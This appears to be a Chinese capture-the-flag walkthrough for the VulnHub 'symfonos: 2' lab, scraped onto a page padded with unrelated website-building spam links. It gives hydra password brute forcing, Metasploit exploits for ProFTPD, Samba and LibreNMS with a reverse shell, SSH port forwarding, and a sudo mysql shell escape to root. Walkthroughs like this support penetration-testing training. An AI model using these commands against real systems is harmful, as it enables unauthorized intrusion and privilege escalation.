当前位置: 首页 > wzjs >正文

java可以做网站郑州网站建设

java可以做网站,郑州网站建设,电气网站建设,东莞网络营销服务symfonos: 2 来自 <https://www.vulnhub.com/entry/symfonos-2,331/> 1&#xff0c;将两台虚拟机网络连接都改为NAT模式 2&#xff0c;攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.182&#xff0c;靶场IP192.168.23.253 3&…

symfonos: 2

来自 <https://www.vulnhub.com/entry/symfonos-2,331/>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.253

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.253

端口/协议

服务

版本

关键风险点

建议操作

漏洞利用示例

防御建议

21/tcp (FTP)

ProFTPD

1.3.5

CVE-2015-3306(未授权文件操作/RCE)

- 匿名登录可能

- 尝试mod_copy漏洞利用

- 检查匿名登录

msfconsole<br>use exploit/unix/ftp/proftpd_modcopy_exec<br>set RHOST 目标IP

- 升级ProFTPD版本

- 禁用mod_copy模块

22/tcp (SSH)

OpenSSH

7.4p1 Debian

- 版本较旧,可能存在未知漏洞

- 弱口令风险

- 暴力破解(需用户列表)

- 检查密钥认证配置

hydra -L users.txt -P passwords.txt ssh://目标IP

- 禁用密码登录,使用密钥认证

- 升级OpenSSH

80/tcp (HTTP)

WebFS

1.21

- 非常见Web服务器,可能存在未公开漏洞

- 目录遍历或敏感文件泄露风险

- 目录爆破

- 手动检查页面内容及文件

gobuster dir -u http://目标IP -w 字典路径

- 替换为Nginx/Apache

- 限制目录访问权限

139/445/tcp (Samba)

Samba

4.5.16-Debian

CVE-2017-7494(SambaCry,RCE)

- 未启用SMB签名

- Guest匿名访问可能

- 枚举共享目录

- 检查可写共享并上传恶意库文件

smbclient -L //目标IP -N

msfconsole<br>use exploit/linux/samba/is_known_pipename

- 升级Samba版本

- 禁用Guest访问

- 启用SMB签名

操作系统

Linux

内核版本3.2-4.9(Debian)

- 潜在内核提权漏洞(如Dirty Cow、CVE-2021-4034)

- 结合服务漏洞提权

- 检查内核利用链

searchsploit Linux 3.2

- 定期更新内核补丁

- 限制低权限用户操作

4,分析ftp服务器暴露出来的漏洞,尝试匿名登录访问,失败

ftp anonymous@192.168.23.253

查看共享文件夹,发现存在匿名用户

smbclient -L 192.168.23.253

smbclient //192.168.23.253/anonymous

信息收集得到一个log.txt。从文件当中得到一个用户名aeolus

知道用户名之后, 尝试使用hydra 进行密码爆破

hydra -l aeolus -P /usr/share/wordlists/rockyou.txt ftp://192.168.23.253

成功拿到了账密:aeolus \ sergioteamo

5,再登录ftp服务器

ftp aeolus@192.168.23.253

登录成功,再尝试ssh登录,登录成功

ssh登录发现对用户执行系统命令有诸多限制,尝试将shell迁移到metasploit

msfconsole

search ssh_login

use 0

show options

set rhosts 192.168.23.253

set username aeolus

set password sergioteamo

run

sessions 将sessions 会话升级为一个meterpreter会话 查看sessions 会话

sessions -u 1 升级会话  使用第二个会话

6,成功登录进去,信息收集一下,查看网络相关信息

netstat

8080端口只允许本地访问,那么就需要我做端口转发操作。需要将本地的9999端口映射到靶机的8080端口

ssh -Nf -L 8888:127.0.0.1:8080 aeolus@192.168.23.253

  • ssh: 调用SSH客户端。
  • N: 不执行远程命令,仅用于端口转发。
  • f: 在后台运行SSH客户端。
  • L 8888:127.0.0.1:8080: 本地端口转发,格式为 local_port:remote_address:remote_port。将本地的 8888 端口转发到远程主机的 127.0.0.1:8080
  • aeolus@192.168.23.253: 连接到远程主机 192.168.23.253 上的用户 aeolus

然后尝试访问本地的8888端口的http服务

对网站指纹进行扫描识别

whatweb -v http://127.0.0.1:8888/login

发现网站使用的是libreNMS 系统,使用msf 查看一下该系统是否存在漏洞

search libreNMS

use 1

show options

set USERNAME aeolus

set PASSWORD sergioteamo

set RHOSTS 127.0.0.1

set RPORT 8888

set LHOST 192.168.23.182

run

成功getshell,使用python获得一个可交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

7,信息收集一下,看看怎么提权

sudo -l发现可以使用sudo以root权限执行mysql命令,尝试提权

sudo mysql -e '\! /bin/sh'

成功提权成为root用户,得到flag

http://www.dtcms.com/wzjs/322946.html

相关文章:

  • 北京哪家公司做网站程序员培训机构排名前十
  • 深圳建设网站排名电脑清理优化大师
  • reeyee网站建设西安seo排名
  • 德州网站建设维护潍坊网站建设公司
  • 沙河企业做网站营销软文300字范文
  • 网络大型游戏排行长沙seo网站
  • 如何用wordpress搭建网站软文广告经典案例600
  • 营销型网站网站设计网络推广公司排行榜
  • 大学教学应用网站开发现状友情链接交换网站
  • 深圳市住房和建设局门户网站谷歌推广app
  • 改进网站建设google应用商店
  • 网站做数据分析百度小说搜索热度排行榜
  • 宁波专业网站建设新闻近期大事件
  • 采用什么方法推广网站网站域名怎么注册
  • wordpress 实现 wiki海阳seo排名优化培训
  • 发明迷网站豆渣做豆腐广告网站建设网站排名优化
  • 新农村建设专题网站哪里能搜索引擎优化
  • 昭通市住房和城乡建设局网站自助建站平台
  • 专门做日本旅游的网站有哪些南昌seo外包公司
  • 企业网站建设推荐兴田德润软件开发工资一般多少
  • 笑傲网站建设聊城seo
  • 武汉搞网站建设工资多少钱竞价托管多少钱
  • 武汉做网站找哪家百度销售推广
  • wordpress 匿名评论网络推广优化平台
  • 网站自助建设推广普通话的意义论文
  • 网站关键词优化哪一个淘宝站内推广方式有哪些
  • 户县微网站建设加盟
  • 模板网站哪家好网站查询信息
  • 公司网站建设费用会计入账微博营销软件
  • 网站建设劳务合同品牌策划与推广方案